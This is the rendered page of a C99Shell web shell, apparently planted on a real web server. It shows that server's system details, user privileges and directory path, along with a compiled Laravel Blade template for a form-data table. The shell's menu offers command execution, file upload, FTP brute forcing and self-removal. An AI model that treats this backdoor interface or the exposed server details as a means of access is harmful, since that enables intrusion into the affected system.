!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 29.23 GB of 117.98 GB (24.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     7682a042bd1daa118e4839ef383633fc9362c009.php (4.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


<?php $__env->startSection('title'); ?> Form Data <?php $__env->stopSection(); ?>

<?php $__env->startSection('extra-css'); ?>
    <link rel="stylesheet" href="<?php echo e(asset('plugins/datatables-bs4/css/dataTables.bootstrap4.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('plugins/datatables-responsive/css/responsive.bootstrap4.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-12 mt-3">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title"><?php echo app('translator')->get('customer.list'); ?></h2>
                    </div>
                <!-- /.card-header -->
                    <div class="card-body">
                        <table id="viewFormotable" class="table table-striped table-bordered dt-responsive nowrap">
                            <thead>
                            <?php if($form_details->isNotempty()): ?>
                                <tr>
                                    <?php $__currentLoopData $form_details$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $form_detail): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                        <th><?php echo e($form_detail->input_label); ?></th>
                                    <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                    <th><?php echo app('translator')->get('customer.action'); ?></th>
                                </tr>
                            <?php else: ?>
                                <tr class="text-center">
                                    <th colspan="6">No data available</th>
                                </tr>
                            <?php endif; ?>
                            </thead>
                            <tbody>
                            <?php if($form_datas): ?>
                                <?php $__currentLoopData $form_datas$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $form_data): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                    <tr>
                                        <?php $__currentLoopData $form_data['value']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $data): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                            <td><?php echo e($data); ?></td>
                                        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                        <td>
                                            <button class="btn btn-sm btn-danger"
                                                    data-message="Are you sure you want to delete this data?"
                                                    data-action="<?php echo e(route('customer.form.form.data.delete',[$form_data['id']])); ?>"
                                                    data-input={"_method":"delete"} data-toggle="modal"
                                                    data-target="#modal-confirm">Delete
                                            </button>
                                        </td>
                                    </tr>
                                <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                            <?php else: ?>
                                <tr class="text-center">
                                    <td colspan="6">No data available</td>
                                </tr>
                            <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>
            <!-- /.col -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->
<?php $__env->stopSection(); ?>

<?php $__env->startSection('extra-scripts'); ?>

<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.customer'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/pcolfjqt/mail.picotech.app/resources/views/customer/form/form_data_index.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0057 ]--